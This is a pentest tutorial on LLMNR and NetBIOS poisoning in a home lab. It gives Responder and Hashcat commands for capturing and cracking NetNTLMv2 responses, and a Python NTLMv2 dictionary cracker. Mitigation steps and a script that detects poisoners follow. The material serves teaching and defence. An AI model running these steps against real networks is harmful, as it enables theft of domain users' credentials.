LLMNR and NetBIOS Poisoning

Neeraj Ganasala
Dec 31, 2021

LLMNR/NBT-NS poisoning is one of the first things a pentester checks for on an internal network. It is one of the most common Active Directory attacks: the attacker pretends to be an authoritative name-resolution source on the local segment by answering LLMNR queries (UDP 5355) and NBT-NS queries (UDP 137) for names that no legitimate host would answer.

Active Directory (AD): Active Directory is Microsoft’s directory and identity management service for Windows domain networks. Its main function is to let administrators manage permissions and control access to network resources. AD stores data as objects (users, groups, computers, applications and so on), each identified by its name and described by its attributes.

For example, a company has several divisions, and each division’s computers need to be configured with the software and settings that its work requires. Without central management, installing a new application means installing it on every machine by hand, which is slow and error-prone. Active Directory (together with Group Policy) lets an administrator push the same change to all of those machines at once.

In simple words:

Active Directory is a set of computers joined to a central server (the domain controller), which decides who may log in to them and what they may access.

LLMNR & NBT-NS:

LLMNR stands for Link-Local Multicast Name Resolution and NBT-NS stands for NetBIOS Name Service. Neither is a type of DNS; both are Windows name-resolution protocols that serve as fallbacks when DNS cannot resolve a hostname. When DNS has no answer for a name, the client asks the local network segment instead (LLMNR by multicast to 224.0.0.252 on UDP 5355, NBT-NS by broadcast on UDP 137) whether any host answers to that name.

How can an attacker exploit it?

Now that we have covered what LLMNR does, let’s look at what makes it exploitable. Unlike DNS, which asks a trusted server, LLMNR and NBT-NS ask every host on the local segment whether it knows the name, and any host may answer. When a user opens an SMB path, Windows first tries DNS. If DNS has no answer (a typo, a stale shortcut, a server that no longer exists), the client falls back to LLMNR and then NBT-NS and sends the name to the whole segment. An attacker on that segment simply answers “that’s me” with their own IP address. The client then connects to the attacker’s SMB server and authenticates with NTLM: the attacker sends a server challenge, and the client replies with an NTLMv2 response, an HMAC computed from the user’s NT hash, the username and domain, the challenge and a client blob. Responder logs this as a NetNTLMv2 “hash”. It is not the NT hash itself and cannot be used for pass-the-hash, but it can be cracked offline with John or Hashcat, and while the connection is still open it can be relayed to another server that does not require SMB signing.

Below is an image of the flow of the attack:

Walkthrough of the Attack:

Before diving into the attack I want to show a quick model of my lab setup. I am using VMware Workstation to run an Ubuntu server, which is connected to a Windows 7 client machine using Kerberos and Samba SMB. I am also using Kali Linux as the attacker machine on the same (VMware) network. Below is an illustrated picture of my setup.

Illustrated picture of my lab setup

Step 1:

On the attacker machine (Kali Linux) run Responder to poison the name-resolution requests seen on the network. It is installed in Kali Linux by default. Responder, according to its GitHub page, is an “LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP, and basic HTTP authentication”.

python Responder.py -I eth0 -rdwv

Run it as root, since it binds the privileged ports of its rogue SMB, HTTP and other servers. Check the flags against Responder.py -h on your copy before reusing them: -I is the interface, -w starts the WPAD rogue proxy and -v is verbose, but -d changed meaning from “answer NetBIOS domain-suffix queries” to “answer DHCP broadcast requests” in Responder 3.1, and the latter is far noisier on a production network.

Step 2:

Log in to the Windows 7 client machine, open My Computer, and in the address bar enter a share path whose hostname does not exist.

For example: \\thisisademonstrationofllmnrattack

Step 3:

Responder on the Kali Linux attacker machine will now have captured the client’s NTLMv2 response. It looks like the line in the image below: the format is user::domain:server-challenge:NTProofStr:blob, with the last three fields in hex. Copy the whole line and save it to a file (hash.txt below).

Step 4:

Run Hashcat against the captured response with a good word list (for example rockyou.txt). Mode 5600 is NetNTLMv2; if Responder captured an NTLMv1 response instead (recognisable by its shorter, fixed-length last field), use mode 5500.

hashcat -m 5600 hash.txt rockyou.txt

Step 5:

Wait for Hashcat to finish; hashcat -m 5600 hash.txt --show prints any passwords it recovered.
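To make concrete what Responder captures in Step 3 and what Hashcat’s mode 5600 actually recomputes in Step 4, here is an added example; it is not code from the original post or from the Responder or Hashcat projects. It implements the NTLMv2 computation described above: NT hash = MD4(UTF-16LE(password)); NTLMv2 key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); NTProofStr = HMAC-MD5(NTLMv2 key, server challenge + client blob). The user jdoe, domain CORP, password Winter2021, the server challenge and the client blob are all constructed for the example. MD4 is written out in pure Python because hashlib’s md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

MASK32 = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 needs OpenSSL's legacy provider)."""
    def rotl(x: int, s: int) -> int:
        return ((x << s) | (x >> (32 - s))) & MASK32

    # (round function, additive constant, message-word order, per-step shift cycle)
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000,
         list(range(16)), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    msg = bytearray(data) + b"\x80"                      # padding: 0x80, zeros, 64-bit LE bit length
    msg += b"\x00" * ((56 - len(msg)) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for func, const, order, shifts in rounds:
            for i in range(16):
                a = rotl((a + func(b, c, d) + x[order[i]] + const) & MASK32, shifts[i % 4])
                a, b, c, d = d, a, b, c              # register rotation: ABCD, DABC, CDAB, BCDA
        state = [(s + v) & MASK32 for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """The NT hash stored in the SAM / NTDS.dit: MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain (domain case is kept)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: what the client actually sends, bound to this challenge and this blob."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def build_netntlmv2_line(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    """Render a response the way Responder logs it (hashcat -m 5600): user::domain:chal:proof:blob."""
    proof = nt_proof(ntlmv2_key(password, user, domain), server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def parse_netntlmv2_line(line: str) -> dict:
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack_netntlmv2(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: recompute the proof for each candidate and compare."""
    cap = parse_netntlmv2_line(line)
    for candidate in wordlist:
        guess = nt_proof(ntlmv2_key(candidate, cap["user"], cap["domain"]), cap["challenge"], cap["blob"])
        if hmac.compare_digest(guess, cap["proof"]):
            return candidate
    return None


# Constructed sample capture: assumed user/domain/password, a fixed challenge, a minimal client blob.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = (b"\x01\x01\x00\x00" + b"\x00" * 4              # NTLMv2_CLIENT_CHALLENGE header + reserved
               + struct.pack("<Q", 132_800_000_000_000_000)  # FILETIME timestamp
               + bytes.fromhex("a1b2c3d4e5f60718")            # client nonce
               + b"\x00" * 4 + b"\x00" * 4)                   # reserved + empty AV-pair list
SAMPLE_LINE = build_netntlmv2_line("jdoe", "CORP", "Winter2021", SAMPLE_CHALLENGE, SAMPLE_BLOB)

if __name__ == "__main__":
    print("captured:", SAMPLE_LINE)
    print("cracked: ", crack_netntlmv2(SAMPLE_LINE, ["letmein", "Password1", "Winter2021"]))
```

Two things the code makes visible: what cracking recovers is the password, not a hash you could pass, and the proof is keyed to the server challenge and the client blob, so a captured line cannot be replayed against another server; it can only be cracked offline or, while the victim’s connection is still open, relayed.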

Mitigation:

1. Disable LLMNR and NBT-NS:

Disabling LLMNR:

  1. Open the Group Policy Editor (gpedit.msc on a single machine, or the Group Policy Management Console for a domain GPO that applies to all computers).
  2. Navigate to Computer Configuration > Administrative Templates > Network > DNS Client (under Local Computer Policy on a single machine, under Policies in a domain GPO).
  3. Set “Turn off multicast name resolution” to Enabled. This writes EnableMulticast = 0 under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient, which is the value to check when auditing.

Disabling NBT-NS:

  1. Open your Network Connections and view the properties of your network adapter.
  2. Select Internet Protocol Version 4 (TCP/IPv4) and click Properties.
  3. On the General tab click Advanced, go to the WINS tab, then select “Disable NetBIOS over TCP/IP”.

This setting is per adapter (NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{adapter GUID}) and has no Group Policy setting of its own, so at scale it is pushed with DHCP option 001 “Microsoft Disable Netbios Option” set to 2, or with a startup script that sets the registry value.

2. Use strong passwords: a mix of special characters, numbers, lower and upper case, and more than 14 characters. Cracking a NetNTLMv2 response is an offline dictionary attack, so password strength decides whether a captured response is of any use to the attacker.

3. Enforcing SMB signing stops NTLMv2 relay attacks against SMB, because the attacker cannot sign packets without the session key. It does not prevent the capture or offline cracking of the response, and its cost is extra CPU per packet on busy file servers rather than extra network traffic.
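Disabling the protocols is the fix; on segments where that has not happened yet, a quick way to find an active poisoner is to do what the victim in Step 2 did on purpose: ask LLMNR for a name that cannot exist and see whether anything answers. A legitimate host only answers for its own name, so any answer to a random name is a poisoner such as Responder (or a badly misconfigured host). The script below is an added example, not code from the original post or from Responder; it builds the LLMNR query (which shares the DNS header layout) for a random name, multicasts it to 224.0.0.252:5355 and parses the answers. The probe name prefix and the sample responses in the comments are constructed.

```python
import secrets
import socket
import struct
from typing import List, Tuple

LLMNR_GROUP = "224.0.0.252"   # IPv4 LLMNR multicast group (RFC 4795)
LLMNR_PORT = 5355
QTYPE_A, QCLASS_IN = 1, 1


def encode_name(name: str) -> bytes:
    """DNS wire-format name: length-prefixed labels terminated by a zero byte."""
    return b"".join(bytes([len(label)]) + label.encode("ascii") for label in name.split(".")) + b"\x00"


def build_llmnr_query(txid: int, name: str) -> bytes:
    """LLMNR uses the DNS header: ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT, then one question."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def skip_name(data: bytes, off: int) -> int:
    """Advance past a wire-format name, handling DNS compression pointers (0xC0xx)."""
    while True:
        length = data[off]
        if length & 0xC0 == 0xC0:
            return off + 2
        off += 1
        if length == 0:
            return off
        off += length


def parse_llmnr_response(data: bytes, txid: int) -> List[str]:
    """Return the A-record addresses in a response that matches our transaction ID, else []."""
    if len(data) < 12:
        return []
    rid, flags, qdcount, ancount, _, _ = struct.unpack(">HHHHHH", data[:12])
    if rid != txid or not flags & 0x8000:   # wrong ID, or QR bit clear (a query, not a response)
        return []
    off = 12
    for _ in range(qdcount):
        off = skip_name(data, off) + 4     # QTYPE + QCLASS
    answers = []
    for _ in range(ancount):
        off = skip_name(data, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", data[off:off + 10])
        off += 10
        if rtype == QTYPE_A and rdlen == 4:
            answers.append(socket.inet_ntoa(data[off:off + 4]))
        off += rdlen
    return answers


def probe_for_poisoner(timeout: float = 2.0) -> List[Tuple[str, List[str]]]:
    """Ask the segment for a name that cannot exist; every (source, addresses) answer is a hit."""
    txid = secrets.randbelow(0x10000)
    name = "llmnr-probe-" + secrets.token_hex(6)   # constructed, never a real hostname
    hits = []
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 1)   # link-local only
        sock.settimeout(timeout)
        sock.sendto(build_llmnr_query(txid, name), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                data, (src_ip, _) = sock.recvfrom(4096)
                addrs = parse_llmnr_response(data, txid)
                if addrs:
                    hits.append((src_ip, addrs))
        except socket.timeout:
            pass
    return hits


if __name__ == "__main__":
    for src, addrs in probe_for_poisoner():
        print(f"{src} answered a bogus LLMNR name with {addrs}: likely poisoner")
```

On a multi-homed host set IP_MULTICAST_IF to the interface you want to test, and remember that this only finds poisoners that are actively answering; Responder in analyze mode (-A) just listens and will not show up.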
